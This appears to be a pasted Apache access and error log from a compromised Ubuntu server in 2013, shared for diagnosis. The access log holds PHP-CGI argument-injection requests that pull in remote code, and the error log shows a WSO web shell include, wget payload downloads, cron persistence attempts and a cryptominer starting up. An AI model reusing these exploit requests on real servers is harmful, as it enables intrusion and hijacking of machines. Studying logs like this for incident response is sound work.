94.102.56.237 - - [22/Nov/2013:23:03:16 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 315 “-” "-"
94.102.56.237 - - [22/Nov/2013:23:16:34 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 315 “-” "-"
94.102.56.237 - - [22/Nov/2013:23:25:13 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 315 “-” "-"
94.102.56.237 - - [22/Nov/2013:23:45:06 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk2.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 305 “-” "-"
94.102.56.237 - - [22/Nov/2013:23:45:36 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk2.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 305 “-” "-"
94.102.56.237 - - [22/Nov/2013:23:47:41 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk2.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 305 “-” "-"
94.102.56.237 - - [22/Nov/2013:23:48:24 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk2.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 305 “-” "-"
24.17.76.222 - - [23/Nov/2013:00:33:53 +0300] “\x80w\x01\x03\x01” 200 1397 “-” "-"
24.17.76.222 - - [23/Nov/2013:00:33:53 +0300] “GET /HNAP1/ HTTP/1.1” 404 503 “http://41.188.27.122/” "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)"
80.86.84.72 - - [23/Nov/2013:03:22:27 +0300] “GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1” 404 489 “-” "ZmEu"
80.86.84.72 - - [23/Nov/2013:03:22:27 +0300] “GET /phpMyAdmin/scripts/setup.php HTTP/1.1” 404 479 “-” "ZmEu"
80.86.84.72 - - [23/Nov/2013:03:22:28 +0300] “GET /phpmyadmin/scripts/setup.php HTTP/1.1” 404 478 “-” "ZmEu"
80.86.84.72 - - [23/Nov/2013:03:22:28 +0300] “GET /pma/scripts/setup.php HTTP/1.1” 404 474 “-” "ZmEu"
80.86.84.72 - - [23/Nov/2013:03:22:29 +0300] “GET /myadmin/scripts/setup.php HTTP/1.1” 404 477 “-” "ZmEu"
80.86.84.72 - - [23/Nov/2013:03:22:29 +0300] “GET /MyAdmin/scripts/setup.php HTTP/1.1” 404 478 “-” "ZmEu"
80.86.84.72 - - [23/Nov/2013:03:22:30 +0300] “GET HTTP/1.1” 400 301 “-” "-"
50.16.70.162 - - [23/Nov/2013:04:01:15 +0300] “HEAD / HTTP/1.1” 200 367 “-” "Cloud mapping experiment. Contact research@pdrlabs.net"
54.205.65.107 - - [23/Nov/2013:05:10:42 +0300] “HEAD / HTTP/1.1” 200 367 “-” "Cloud mapping experiment. Contact research@pdrlabs.net"
210.149.29.182 - - [23/Nov/2013:06:38:41 +0300] “POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 200 216 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
94.102.56.237 - - [23/Nov/2013:08:47:58 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk2.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 305 “-” "-"
50.178.115.102 - - [23/Nov/2013:08:51:47 +0300] “\x80w\x01\x03\x01” 200 1397 “-” "-"
50.178.115.102 - - [23/Nov/2013:08:51:48 +0300] “GET /HNAP1/ HTTP/1.1” 404 503 “http://41.188.27.122/” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008092215 Firefox/3.0.1 Orca/1.1 beta 3”
[/quote]
error.log
[quote][Sun Nov 17 07:48:18 2013] [warn] RSA server certificate CommonName (CN) ubuntu' does NOT match server name!? [Sun Nov 17 07:48:18 2013] [warn] RSA server certificate CommonName (CN)
ubuntu’ does NOT match server name!?
[Sun Nov 17 07:48:18 2013] [warn] Init: Name-based SSL virtual hosts only work for clients with TLS server name indication support (RFC 4366)
[Sun Nov 17 07:48:18 2013] [notice] Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k configured – resuming normal operations
[Sun Nov 17 07:48:18 2013] [warn] long lost child came home! (pid 1497)
[Sun Nov 17 07:48:18 2013] [warn] long lost child came home! (pid 1498)
[Sun Nov 17 07:48:18 2013] [warn] long lost child came home! (pid 1499)
[Sun Nov 17 07:48:18 2013] [warn] long lost child came home! (pid 1500)
[Sun Nov 17 07:48:18 2013] [warn] long lost child came home! (pid 1501)
[Mon Nov 18 09:35:22 2013] [error] [client 192.168.11.14] PHP Warning: pg_pconnect(): Unable to connect to PostgreSQL server: FATAL: authentification Ident ?chou?e pour l’utilisateur << gforge >> in /usr/share/gforge/common/include/database-pgsql.php on line 78
[Mon Nov 18 09:47:43 2013] [error] [client 66.84.25.66] perl: no process found
[Mon Nov 18 09:47:43 2013] [error] [client 66.84.25.66] --2013-11-18 09:47:43-- 198.204.233.124/…/unix
[Mon Nov 18 09:47:43 2013] [error] [client 66.84.25.66] Connecting to 198.204.233.124:80…
[Mon Nov 18 09:47:43 2013] [error] [client 66.84.25.66] connected.
[Mon Nov 18 09:47:43 2013] [error] [client 66.84.25.66] HTTP request sent, awaiting response…
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] 200 OK
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] Length:
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] 38669
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] (38K)
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] Saving to: `unix’
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] 0K
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] .
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] .
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66] 100%
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66] 52.2K
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66] =0.7s
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66] 2013-11-18 09:47:45 (52.2 KB/s) - unix' saved [38669/38669] [Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66] [Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66] Premature end of script headers: php [Mon Nov 18 15:55:17 2013] [error] [client 2.100.158.26] request failed: error reading the headers [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] <b>Security Alert!</b> The PHP CGI cannot be accessed directly. [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] <p>This PHP CGI binary was compiled with force-cgi-redirect enabled. This [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] means that a page will only be served up if the REDIRECT_STATUS CGI variable is [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] set, e.g. via an Apache Action directive.</p> [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] <p>For more information as to <i>why</i> this behaviour exists, see the <a href="http://php.net/security.cgi-bin">manual page for CGI security</a>.</p> [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] <p>For more information about changing this behaviour or re-enabling this webserver, [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] consult the installation file that came with this distribution, or visit [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] <a href="http://php.net/install.windows">the manual page</a>.</p> [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] Premature end of script headers: php [Tue Nov 19 07:45:11 2013] [error] [client 192.168.11.14] PHP Warning: pg_pconnect(): Unable to connect to PostgreSQL server: FATAL: authentification Ident ?chou?e pour l'utilisateur << gforge >> in /usr/share/gforge/common/include/database-pgsql.php on line 78 [Tue Nov 19 16:32:35 2013] [error] [client 192.168.11.14] PHP Warning: pg_pconnect(): Unable to connect to PostgreSQL server: FATAL: authentification Ident ?chou?e pour l'utilisateur << gforge >> in /usr/share/gforge/common/include/database-pgsql.php on line 78 [Tue Nov 19 18:14:57 2013] [error] [client 82.221.105.6] File does not exist: /var/www/robots.txt [Wed Nov 20 08:37:08 2013] [error] [client 192.168.11.14] PHP Warning: pg_pconnect(): Unable to connect to PostgreSQL server: FATAL: authentification Ident ?chou?e pour l'utilisateur << gforge >> in /usr/share/gforge/common/include/database-pgsql.php on line 78 [Thu Nov 21 06:03:13 2013] [error] [client 198.20.69.74] File does not exist: /var/www/robots.txt [Thu Nov 21 08:30:11 2013] [error] [client 192.168.11.14] PHP Warning: pg_pconnect(): Unable to connect to PostgreSQL server: FATAL: authentification Ident ?chou?e pour l'utilisateur << gforge >> in /usr/share/gforge/common/include/database-pgsql.php on line 78 [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] <b>Security Alert!</b> The PHP CGI cannot be accessed directly. [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] <p>This PHP CGI binary was compiled with force-cgi-redirect enabled. This [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] means that a page will only be served up if the REDIRECT_STATUS CGI variable is [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] set, e.g. via an Apache Action directive.</p> [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] <p>For more information as to <i>why</i> this behaviour exists, see the <a href="http://php.net/security.cgi-bin">manual page for CGI security</a>.</p> [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] <p>For more information about changing this behaviour or re-enabling this webserver, [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] consult the installation file that came with this distribution, or visit [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] <a href="http://php.net/install.windows">the manual page</a>.</p> [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] Premature end of script headers: php [Thu Nov 21 17:13:36 2013] [error] [client 192.168.11.14] PHP Warning: pg_pconnect(): Unable to connect to PostgreSQL server: FATAL: authentification Ident ?chou?e pour l'utilisateur << gforge >> in /usr/share/gforge/common/include/database-pgsql.php on line 78 [Thu Nov 21 17:33:52 2013] [error] [client 82.221.102.181] PHP Warning: Unknown: failed to open stream: HTTP request failed! HTTP/1.0 522 Unknown\r [Thu Nov 21 17:33:52 2013] [error] [client 82.221.102.181] in Unknown on line 0 [Thu Nov 21 17:33:52 2013] [error] [client 82.221.102.181] PHP Fatal error: Unknown: Failed opening required 'http://files.xakep.biz/shells/PHP/wso.txt' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0 [Thu Nov 21 17:35:02 2013] [error] [client 82.221.102.181] PHP Warning: Unknown: failed to open stream: HTTP request failed! HTTP/1.0 522 Unknown\r [Thu Nov 21 17:35:02 2013] [error] [client 82.221.102.181] in Unknown on line 0 [Thu Nov 21 17:35:02 2013] [error] [client 82.221.102.181] PHP Fatal error: Unknown: Failed opening required 'http://files.xakep.biz/shells/PHP/wso.txt' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0 [Thu Nov 21 17:39:17 2013] [error] [client 82.221.102.181] PHP Notice: Undefined variable: argc in [files.xakep.biz/shells/PHP/wso.txt](http://files.xakep.biz/shells/PHP/wso.txt) on line 7 [Thu Nov 21 17:41:38 2013] [error] [client 82.221.102.181] PHP Warning: Unknown: failed to open stream: HTTP request failed! HTTP/1.0 522 Unknown\r [Thu Nov 21 17:41:38 2013] [error] [client 82.221.102.181] in Unknown on line 0 [Thu Nov 21 17:41:38 2013] [error] [client 82.221.102.181] PHP Fatal error: Unknown: Failed opening required 'http://files.xakep.biz/shells/PHP/wso.txt' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0 [Thu Nov 21 17:46:15 2013] [error] [client 82.221.102.181] PHP Warning: Unknown: failed to open stream: HTTP request failed! HTTP/1.0 522 Unknown\r [Thu Nov 21 17:46:15 2013] [error] [client 82.221.102.181] in Unknown on line 0 [Thu Nov 21 17:46:15 2013] [error] [client 82.221.102.181] PHP Fatal error: Unknown: Failed opening required 'http://files.xakep.biz/shells/PHP/wso.txt' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0 [Thu Nov 21 17:48:04 2013] [error] [client 82.221.102.181] PHP Warning: Unknown: failed to open stream: HTTP request failed! HTTP/1.0 522 Unknown\r [Thu Nov 21 17:48:04 2013] [error] [client 82.221.102.181] in Unknown on line 0 [Thu Nov 21 17:48:04 2013] [error] [client 82.221.102.181] PHP Fatal error: Unknown: Failed opening required 'http://files.xakep.biz/shells/PHP/wso.txt' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0 [Thu Nov 21 17:49:11 2013] [error] [client 82.221.102.181] PHP Warning: Unknown: failed to open stream: HTTP request failed! HTTP/1.0 520 Unknown\r [Thu Nov 21 17:49:11 2013] [error] [client 82.221.102.181] in Unknown on line 0 [Thu Nov 21 17:49:11 2013] [error] [client 82.221.102.181] PHP Fatal error: Unknown: Failed opening required 'http://files.xakep.biz/shells/PHP/wso.txt' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0 [Thu Nov 21 18:31:33 2013] [error] [client 82.221.102.181] PHP Notice: Undefined variable: argc in [files.xakep.biz/shells/PHP/wso.txt](http://files.xakep.biz/shells/PHP/wso.txt) on line 7 [Fri Nov 22 00:15:52 2013] [error] [client 94.102.56.237] File does not exist: /var/www/cgi-php [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] --2013-11-22 00:44:26-- [74.208.228.113/lol](http://74.208.228.113/lol) [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] Connecting to 74.208.228.113:80... [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] connected. [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] HTTP request sent, awaiting response... [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] --2013-11-22 00:44:26-- [europay24.info/c](http://europay24.info/c) [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] Resolving europay24.info... [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] 200 OK [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] Length: 6907 (6.7K) [text/plain] [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] Saving to:
lol’
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] 0K .
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] .
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] .
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] …
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] . 100% 1.31M=0.005s
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] 2013-11-22 00:44:26 (1.31 MB/s) - lol' saved [6907/6907] [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] sh: curl: not found [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] sh: fetch: not found [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] 85.17.180.61 [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] Connecting to europay24.info|85.17.180.61|:80... [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] connected. [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] HTTP request sent, awaiting response... [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] 200 OK [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] Length: 263 [text/plain] [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] Saving to:
c’
[Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] 0K 100%
[Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] 43.7M=0s
[Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] 2013-11-22 00:44:27 (43.7 MB/s) - c' saved [263/263] [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] --2013-11-22 00:44:27-- [europay24.info/a](http://europay24.info/a) [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] Resolving europay24.info... [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] 85.17.180.61 [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] Connecting to europay24.info|85.17.180.61|:80... [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] connected. [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] HTTP request sent, awaiting response... [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] 200 OK [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] Length: 716 [text/plain] [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] Saving to:
a’
[Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] 0K 100% 128M=0s
[Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] 2013-11-22 00:44:28 (128 MB/s) - a' saved [716/716] [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] --2013-11-22 00:44:28-- [europay24.info/update](http://europay24.info/update) [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] Resolving europay24.info... 85.17.180.61 [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] Connecting to europay24.info|85.17.180.61|:80... connected. [Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] HTTP request sent, awaiting response... 200 OK [Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] Length: 215 [text/plain] [Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] Saving to:
update’
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] 0K 100% 39.2M=0s
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] 2013-11-22 00:44:29 (39.2 MB/s) - update' saved [215/215] [Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] cp: cannot create regular file
/etc/cron.hourly/update’: Permission denied
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on CIRRICULUM VITAE.docx\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on keyring-rWp2Uc\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on orbit-andry\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on orbit-gdm\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on orbit-root\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on pulse-PKdhtXMmr18n\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on pulse-uZEcfmJ73JvE\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on ssh-NQaeNL1573\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on virtual-andry.NAYr4U\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] --2013-11-22 00:44:29-- europay24.info/clamav
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] Resolving europay24.info… 85.17.180.61
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] Connecting to europay24.info|85.17.180.61|:80… connected.
[Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] HTTP request sent, awaiting response… 200 OK
[Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] Length: 379680 (371K) [text/plain]
[Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] Saving to: clamav' [Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] 0K .......... .......... .......... .......... .......... 13% 337K 1s [Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] 50K .......... .......... .......... .......... .......... 26% 1012K 1s [Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] 100K .......... .......... .......... .......... .......... 40% 845K 0s [Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] 150K .......... .......... .......... .......... .......... 53% 738K 0s [Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] 200K .......... .......... .......... .......... .......... 67% 878K 0s [Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] 250K .......... .......... .......... .......... .......... 80% 644K 0s [Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] 300K .......... .......... .......... .......... .......... 94% 122K 0s [Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] 350K .......... .......... 100% 11.3M=0.9s [Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] 2013-11-22 00:44:31 (425 KB/s) -
clamav’ saved [379680/379680]
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] --2013-11-22 00:44:31-- europay24.info/sh
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] Resolving europay24.info… 85.17.180.61
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] Connecting to europay24.info|85.17.180.61|:80… connected.
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] HTTP request sent, awaiting response… 200 OK
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] Length: 518288 (506K) [text/plain]
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] Saving to: sh' [Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:32 2013] [error] [client 50.116.50.35] 0K .......... .......... .......... .......... .......... 9% 48.1K 9s [Fri Nov 22 00:44:32 2013] [error] [client 50.116.50.35] 50K .......... .......... .......... .......... .......... 19% 933K 4s [Fri Nov 22 00:44:33 2013] [error] [client 50.116.50.35] 100K .......... .......... .......... .......... .......... 29% 64.1K 4s [Fri Nov 22 00:44:34 2013] [error] [client 50.116.50.35] 150K .......... .......... .......... .......... .......... 39% 125K 3s [Fri Nov 22 00:44:34 2013] [error] [client 50.116.50.35] 200K .......... .......... .......... .......... .......... 49% 385K 2s [Fri Nov 22 00:44:34 2013] [error] [client 50.116.50.35] 250K .......... .......... .......... .......... .......... 59% 177K 2s [Fri Nov 22 00:44:34 2013] [error] [client 50.116.50.35] 300K .......... .......... .......... .......... .......... 69% 182K 1s [Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] 350K .......... .......... .......... .......... .......... 79% 180K 1s [Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] 400K .......... .......... .......... .......... .......... 88% 101K 0s [Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] 450K .......... .......... .......... .......... .......... 98% 846K 0s [Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] 500K ...... 100% 1.14M=3.8s [Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] 2013-11-22 00:44:35 (133 KB/s) -
sh’ saved [518288/518288]
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] kill: 22: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]… or
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] kill -l [exitstatus]
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:35] Starting Stratum on stratum+tcp://216.230.103.42:3333
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:35] 4 miner threads started, using ‘scrypt’ algorithm.
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:35] Binding thread 3 to cpu 3
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:35] Binding thread 0 to cpu 0
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] ./sh: 1: \x7fELF\x02\x01\x01\x02: not found
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] ./sh: 2: Syntax error: “(” unexpected
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:35] Binding thread 2 to cpu 2
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] chattr: Operation not permitted while setting flags on bash\r
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] chattr: Operation not permitted while setting flags on sh\r
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:35] Binding thread 1 to cpu 1
[Fri Nov 22 00:44:37 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:37] Stratum detected new block
[Fri Nov 22 00:44:38 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:38] thread 3: 4096 hashes, 3.75 khash/s
